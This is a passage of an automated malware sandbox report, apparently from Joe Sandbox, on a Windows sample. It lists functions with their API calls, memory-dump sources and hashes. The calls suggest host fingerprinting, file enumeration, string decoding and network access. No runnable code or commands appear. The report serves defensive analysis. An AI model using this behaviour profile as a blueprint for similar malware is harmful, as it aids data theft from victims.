                                                      • Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction Fuzzy Hash: A8F027701082444BEB186A64DD4A32EF7D9EB46350F10493BEEDAE72E2E278C840857F
                                                      Function 00422CA0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1912 422ca0-422cf2 GetProcessHeap HeapAlloc GetComputerNameA 1913 422d14-422d29 1912->1913 1914 422cf4-422d06 1912->1914
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422CCF
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422CD6
                                                      • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422CEA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocComputerNameProcess
                                                      • String ID:
                                                      • API String ID: 4203777966-0
                                                      • Opcode ID: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
                                                      • Instruction ID: 1ad5e2c4eb5efa73f1b35bfbbb8ccb03f83dc81d7400d569231bf54a936ba5f3
                                                      • Opcode Fuzzy Hash: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
                                                      • Instruction Fuzzy Hash: 2301D672B44254ABC714CF99ED45B9AF7B8F744B21F10026BFD15D3780D7B859008AE1
                                                      Function 02D6D43E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D6D466
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02D6D486
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D6C000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2d6c000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: f7413f8827ad7830549f11e1187988c5fb0483a71cd22e54a64437acd7acadcd
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: FAF096313007117BD7243BF9F88DBBE76E9AF49624F100628E696D19C0DB74FC458A61
                                                      Function 02C70E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000400,?,?,02C70223,?,?), ref: 02C70E19
                                                      • SetErrorMode.KERNEL32(00000000,?,?,02C70223,?,?), ref: 02C70E1E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction ID: 25ef51fef4db5f7ec44bd9215f2815ef669215441d4b8e203029a7bdcddcdc72
                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                      • Instruction Fuzzy Hash: 05D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4047EA
                                                      Function 02D6D0FD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D6D14E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D6C000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2d6c000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction ID: 511d06dc684d56cbd17a01e37b5f9fa2299290b01b63261b7e1140279adca5fe
                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                      • Instruction Fuzzy Hash: 87112A79A00208EFDB01DF98C989E98BBF5EB08350F1580A4F9489B361D375EA50DF90

                                                      Non-executed Functions

                                                      Function 02C81C57 Relevance: 132.9, APIs: 88, Instructions: 909stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81C89
                                                      • lstrlen.KERNEL32(004317A0), ref: 02C81C94
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81CB6
                                                      • lstrcat.KERNEL32(00000000,004317A0), ref: 02C81CC2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81CE9
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C81CFE
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C81D1E
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C81D38
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81D76
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81DA9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C81DD1
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81DDC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E03
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C81E15
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E37
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C81E43
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E6B
                                                      • lstrlen.KERNEL32(?), ref: 02C81E7F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81E9C
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C81EAA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81ED0
                                                      • lstrlen.KERNEL32(00638D00), ref: 02C81EE6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81F10
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81F1B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81F46
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C81F58
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81F7A
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C81F86
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81FAF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C81FDC
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81FE7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8200E
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C82020
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82042
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C8204E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82077
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C820A6
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C820B1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C820D8
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C820EA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8210C
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C82118
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82141
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82170
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C8217B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C821A4
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C821D0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C821ED
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C821F9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8221F
                                                      • lstrlen.KERNEL32(006389A8), ref: 02C82235
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82269
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C8227D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8229A
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C822A6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C822CC
                                                      • lstrlen.KERNEL32(00638BDC), ref: 02C822E2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82316
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C8232A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82347
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C82353
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82379
                                                      • lstrlen.KERNEL32(00638CE8), ref: 02C8238F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C823B7
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C823C2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C823ED
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C823FF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8241E
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C8242A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8244F
                                                      • lstrlen.KERNEL32(?), ref: 02C82463
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C82487
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C82495
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C824BA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C824F6
                                                      • lstrlen.KERNEL32(00638CA4), ref: 02C82505
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8252D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C82538
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                                      • String ID:
                                                      • API String ID: 712834838-0
                                                      • Opcode ID: 3d77b5c61fa7b1930e55321776d513a302bb4781bd6cd9d06fb294281b17fff3
                                                      • Instruction ID: 625db320ff805c95ce5faed69c5e9098d81495e1956169f3f005cfb03a967ae5
                                                      • Opcode Fuzzy Hash: 3d77b5c61fa7b1930e55321776d513a302bb4781bd6cd9d06fb294281b17fff3
                                                      • Instruction Fuzzy Hash: 2F6295715016579BDB11BF74CC8CAAE7BBAEF84708F048528EC05A7250DB74DA05EFA2
                                                      Function 004060D0 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 816stringnetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004060FF
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406152
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406185
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 004061B5
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 004061F0
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406223
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406233
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 4f0ce9c0fb1772c530d97c52082a4be0ed6778ec1307027d3c312cc39a626e22
                                                      • Instruction ID: e1c77a48c9db9f9d7e3cee1d994f76c9f30b806028e6ece8452b3a013e69dddc
                                                      • Opcode Fuzzy Hash: 4f0ce9c0fb1772c530d97c52082a4be0ed6778ec1307027d3c312cc39a626e22
                                                      • Instruction Fuzzy Hash: 9C526D71A002169FCB21AB79DD89A9F77B5AF44304F15503AF806B72D1DB78EC058FA8
                                                      Function 02C76337 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 816stringnetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C76366
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C763B9
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C763EC
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7641C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C76457
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7648A
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02C7649A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 4d8a2cabd9318834d20159f90b681af5907982a0b19ed4795d5b6e39518a98be
                                                      • Instruction ID: 6bde8148061b85409dd4e49978c7268aae28d846e4bf7bc5936b256a95f6766f
                                                      • Opcode Fuzzy Hash: 4d8a2cabd9318834d20159f90b681af5907982a0b19ed4795d5b6e39518a98be
                                                      • Instruction Fuzzy Hash: CA5271719016569FDB10EFB4DC88EAE7BBAEF84308F148428E805A7250DB74E945DFA1
                                                      Function 02C83CD7 Relevance: 122.4, APIs: 81, Instructions: 869stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • wsprintfA.USER32 ref: 02C83CF3
                                                      • FindFirstFileA.KERNEL32(?,?), ref: 02C83D0A
                                                      • StrCmpCA.SHLWAPI(?,004317A8), ref: 02C83D33
                                                      • StrCmpCA.SHLWAPI(?,004317AC), ref: 02C83D4D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C83D86
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C83DAE
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C83DB9
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C83DC4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83DE1
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C83DED
                                                      • lstrlen.KERNEL32(?), ref: 02C83DFA
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83E1A
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C83E28
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83E51
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C83E95
                                                      • lstrlen.KERNEL32(?), ref: 02C83E9F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83ECC
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C83ED7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83EFD
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C83F0F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83F31
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C83F3D
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83F65
                                                      • lstrlen.KERNEL32(?), ref: 02C83F79
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83F99
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C83FA7
                                                      • lstrlen.KERNEL32(006389F0), ref: 02C83FD2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C83FF8
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84003
                                                      • lstrlen.KERNEL32(00638D00), ref: 02C84025
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8404B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84056
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8407E
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C84090
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C840AF
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C840BB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C840E1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8410E
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84119
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84140
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C84152
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84174
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C84180
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C841A9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C841D8
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C841E3
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8420A
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C8421C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8423E
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C8424A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84273
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C842A2
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C842AD
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C842D4
                                                      • lstrlen.KERNEL32(0043179C), ref: 02C842E6
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84308
                                                      • lstrcat.KERNEL32(00000000,0043179C), ref: 02C84314
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8433C
                                                      • lstrlen.KERNEL32(?), ref: 02C84350
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84370
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C8437E
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C843A7
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C843E6
                                                      • lstrlen.KERNEL32(00638CA4), ref: 02C843F5
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8441D
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84428
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84451
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84495
                                                      • lstrcat.KERNEL32(00000000), ref: 02C844A2
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 02C846A0
                                                      • FindClose.KERNEL32(00000000), ref: 02C846AF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                                      • String ID:
                                                      • API String ID: 1006159827-0
                                                      • Opcode ID: e1e3807f12193d2689bfbdaf04f1d1e2928ce3de2f460a85145a4516f308cbb5
                                                      • Instruction ID: 4877e4432be9908e1300e0abc241d290327dc4025c97f07b93cb1ac70cf0e021
                                                      • Opcode Fuzzy Hash: e1e3807f12193d2689bfbdaf04f1d1e2928ce3de2f460a85145a4516f308cbb5
                                                      • Instruction Fuzzy Hash: EA6291719016579BDB25BF75CC88AAE7BBAEF8470CF048528F805A3250DB74DA04DFA1
                                                      Function 02C74EB7 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C74EE6
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74F39
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74F6C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74F9C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C74FDA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7500D
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02C7501D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------
                                                      • API String ID: 2041821634-2370822465
                                                      • Opcode ID: 4ad1566aa4d1a6649d9a197ec9ce9ed6d1b2bf2dd256a75520a651cb196df419
                                                      • Instruction ID: 2ec8a39212e2791a015efb3df878bea002f07c0abe7eeb90809d0ec5c83e4ee2
                                                      • Opcode Fuzzy Hash: 4ad1566aa4d1a6649d9a197ec9ce9ed6d1b2bf2dd256a75520a651cb196df419
                                                      • Instruction Fuzzy Hash: 2D527E719016569FDB10EFB4CC88BAEBBB6EF84348F554028E805A7250DB74E946DFE0
                                                      Function 02C86F20 Relevance: 96.5, APIs: 64, Instructions: 526stringmemoryencryptionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86F44
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86F74
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86FA4
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C86FD6
                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02C86FE3
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C86FEA
                                                      • StrStrA.SHLWAPI(00000000,00434D94), ref: 02C87001
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8700C
                                                      • malloc.MSVCRT ref: 02C87016
                                                      • strncpy.MSVCRT ref: 02C87024
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8704F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C87076
                                                      • StrStrA.SHLWAPI(00000000,00434D9C), ref: 02C87089
                                                      • lstrlen.KERNEL32(00000000), ref: 02C87094
                                                      • malloc.MSVCRT ref: 02C8709E
                                                      • strncpy.MSVCRT ref: 02C870AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C870D7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C870FE
                                                      • StrStrA.SHLWAPI(00000000,00434DA4), ref: 02C87111
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8711C
                                                      • malloc.MSVCRT ref: 02C87126
                                                      • strncpy.MSVCRT ref: 02C87134
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8715F
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C87186
                                                      • StrStrA.SHLWAPI(00000000,00434DAC), ref: 02C87199
                                                      • lstrlen.KERNEL32(00000000), ref: 02C871A8
                                                      • malloc.MSVCRT ref: 02C871B2
                                                      • strncpy.MSVCRT ref: 02C871C0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C871F0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C87218
                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02C8723B
                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 02C8724F
                                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 02C87270
                                                      • LocalFree.KERNEL32(00000000), ref: 02C8727B
                                                      • lstrlen.KERNEL32(?), ref: 02C87315
                                                      • lstrlen.KERNEL32(?), ref: 02C87328
                                                      • lstrlen.KERNEL32(?), ref: 02C8733B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                                      • String ID:
                                                      • API String ID: 2413810636-0
                                                      • Opcode ID: 8a715b1a4409878960c6aae2b2daf2f0f252ea71bb024136e07dc667a33e066e
                                                      • Instruction ID: bc458530274968b064d0974a62b62cb33fac9bd93a26b0394765fc9478c0a955
                                                      • Opcode Fuzzy Hash: 8a715b1a4409878960c6aae2b2daf2f0f252ea71bb024136e07dc667a33e066e
                                                      • Instruction Fuzzy Hash: 3E027274A00256AFDB10ABB4DC88B9EBBBAEF44708F249414F805E7250EB74D945DFA1
                                                      Function 02C84ED7 Relevance: 67.1, APIs: 44, Instructions: 1095stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C84F18
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F3B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C84F46
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C84F51
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84F6E
                                                      • lstrcat.KERNEL32(00000000,00434CB0), ref: 02C84F7A
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C84FA5
                                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 02C84FC1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2567437900-0
                                                      • Opcode ID: 28406a95d0cc64f91aa304dbf2a2fc930f4309ba88c17d185a32f68a67b3ea55
                                                      • Instruction ID: fce032c97ee04487123381dc8280d71012e8d4b944730e9910cc9e46a7cd8ba4
                                                      • Opcode Fuzzy Hash: 28406a95d0cc64f91aa304dbf2a2fc930f4309ba88c17d185a32f68a67b3ea55
                                                      • Instruction Fuzzy Hash: 11923170A012058FDB24EF29C988B69B7F5AF8435CF5AC0ADD8099B3A1D7B1D941DF90
                                                      Function 02C81607 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C81648
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8166B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C81676
                                                      • lstrlen.KERNEL32(00434CB0), ref: 02C81681
